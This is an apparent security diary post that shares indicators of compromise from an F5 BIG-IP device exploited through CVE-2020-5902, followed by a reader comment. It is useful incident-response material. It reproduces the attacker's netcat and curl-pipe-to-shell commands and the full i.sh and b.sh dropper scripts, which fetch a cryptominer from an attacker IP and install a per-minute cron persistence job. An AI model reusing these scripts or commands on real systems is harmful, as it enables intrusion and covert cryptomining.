A few IoCs related to CVE-2020-5902

Published: 2020-07-22. Last Updated: 2020-07-23 12:22:39 UTC
by Rick Wanner (Version: 2)
1 comment(s)

I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902.  As I responded I captured a number if indicators of compromise.  While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.


The F5 vulnerability, CVE-2020-5902 was announced, and patches and workarounds made available, by F5 on June 30, 2020.  This was a CVSS score 10 which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.


On this particular F5, probes for the presence of the vulnerability began on July 3, 2020 and over the course of the subsequent 4 days the device was probed for vulnerability to CVE-2020-5902 2561 times from 364 unique IPs.


The first detectable exploit was executed against the F5 on July 4, 2020.  Exploits continued to be executed against the F5 a number of times over the next few days.  It is hard to gauge the effectiveness of these exploits but there is no indication that any of these exploits achieved an effective foothold in the F5.


The first detectable foothold in the F5 was on July 6, 2020.  As shown in an earlier diary an alias was used to get access to a shell which was used to execute:


nc 217.12.199.179 9999


which resulted in the execution of:


curl 217.12.199.179/i.sh | sh

As of writing 212.12.199.179 is still up and is still serving up the shell scripts related to this attack.


Here are the contents of i.sh

SHA256 - 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5 
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi


WGET="wget -O"
if [ -s /usr/bin/curl ]; then
 WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
 WGET="wget -O"
fi

DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
 if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
  if [ -x "$(command -v md5sum)" ]; then
   sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
   echo $sum
   case $sum in
   fa3cf35e7e83175f395a5b6d35fd456d)
    echo "bigip OK"
    ;;
   *)
    echo "bigip wrong"
    rm -rf /tmp/bigip
    sleep 1
    ;;
   esac
  fi
  echo "P OK"
 else
  DIR=$(mktemp -d)/tmp
  mkdir $DIR
  echo "T DIR $DIR"
 fi
else
 if [ -d "/var/tmp" ]; then
  DIR="/var/tmp"
 fi
 echo "P NOT EXISTS"
fi

download() {
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download2
   ;;
  esac
 else
  echo "No md5sum"
  download2
 fi
}
download2() {
 $WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download3
   ;;
  esac
 else
  echo "No md5sum"
  download3
 fi
}

download3() {
 $WGET $DIR/bigip http://217.12.199.179/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   ;;
  esac
 else
  echo "No md5sum"
 fi
}

download
SKL=b $DIR/bigip

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh adds a recurring cron job which executes a script, b.sh from the same IP.

Here are the contents of b.sh.  SHA-256 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh also downloaded an executable called bigip to /var/tmp which launched a process (daemon) on the F5, /tmp/bigipdaemon.

c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection

517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d  bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection


The files are a cryptominer which mines cryptocurrency on behalf of the attacker.  The firewall logs clearly show the cryptominer communicating to the IP in the Ukraine where the shell scripts were downloaded from. 

Besides the IP associated with the cryptomining the attacker also communicated with 9 other Ips. 

Cryptominer IPs
destination_address    destination_port    Country
217.12.199.179    80    Ukraine

Other associated IPs:        
destination_address    destination_port    Country
193.26.217.129    80    Russia
193.53.127.188    80    Russia
213.226.114.20    80    Russia
213.32.10.148    80    France
45.8.228.49    80    Russia
5.23.52.131    80    Russia
62.109.25.117    80    Russia
95.142.44.164    80    Russia
217.8.117.137    80    Russia
 

I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime.  If anyone has any more related IoCs,  please include them in the comments or send them on via the ISC contact page and I will update this diary with the new findings.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Keywords: CVE20205902 F5 IoC
1 comment(s)

Comments

Just for the record, we had a compromised F5 system at a remote site (supplier chain) 3 days after the CVE announcement, where 2 additional user accounts were created on the compromised F5.
Unfortunatly, we do do not have access to any deeper logs. So the F5 was patched, reviewed and all uploaded TLS-certificates were renewed and the (may be) compromised old ones revoked. The private keys for the old certs were also uploaded before. I would advice anyone with any indicator of compromise to do as well. If anyone has further suggestions, please leave a comment here.

Thanks,
Ron

Diary Archives